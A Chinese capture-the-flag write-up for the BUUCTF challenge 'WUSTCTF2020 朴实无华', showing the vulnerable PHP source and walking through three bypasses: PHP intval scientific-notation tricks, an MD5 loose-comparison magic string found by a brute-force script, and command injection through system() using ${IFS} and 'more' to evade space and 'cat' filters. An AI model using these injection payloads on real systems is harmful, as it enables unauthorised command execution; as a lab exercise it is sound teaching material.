BUUCTF-[WUSTCTF2020]朴实无华(代码审计)
1、在title看到bot,访问robots.txt
2、
User-agent: *
Disallow: /fAke_f1agggg.php
继续访问/fAke_f1agggg.php
3、在响应头发现/fl4g.php:
得到源码:
//level 1
if (isset($_GET['num'])){
$num = $_GET['num'];
if(intval($num) < 2020 && intval($num + 1) > 2021){
echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
}else{
die("金钱解决不了穷人的本质问题");
}
}else{
die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5($md5))
echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
else
die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
die("去非洲吧");
}
//get flag
if (isset($_GET['get_flag'])){
$get_flag = $_GET['get_flag'];
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
system($get_flag);
}else{
die("快到非洲了");
}
}else{
die("去非洲吧");
}
第一层:
if(intval($num) < 2020 && intval($num + 1) > 2021)
发现intval()函数在处理字符串型的科学计数法时,只输出e前面的数字
马上测试:
<?php
echo intval(1e10);
echo "\r\n";
echo intval("1e10");
echo "\r\n";
echo intval("1e10"+1);
?>
运行结果:
10000000000
1
10000000001
发现$a+1
,如果$a
是字符串型的科学计数法,$a+1
后,$a
会强制转换为数字
所以,url:/fl4g.php?num=1e10
第二层:
if ($md5==md5($md5))
要求字符串md5后还与原字符串弱相等
写脚本跑一下:
import hashlib
for i in range(0,10**41):
i='0e'+str(i)
md5=hashlib.md5(i.encode()).hexdigest()
if md5[:2]=='0e' and md5[2:].isdigit():
print('md5:{} '.format(i))
break
十几分钟后跑出:
md5:0e215962017
url:/fl4g.php?num=1e10&md5=0e141&md5=0e215962017
第三层:
if(!strstr($get_flag," ")){
$get_flag = str_ireplace("cat", "wctf2020", $get_flag);
echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
system($get_flag);
$get_flag
不能有空格,不能有cat字符串
空格绕过,参考:https://www.freebuf.com/articles/web/137923.html
cat用more绕过
url:/fl4g.php?num=1e10&md5=0e141&md5=0e215962017&get_flag=more${IFS}ls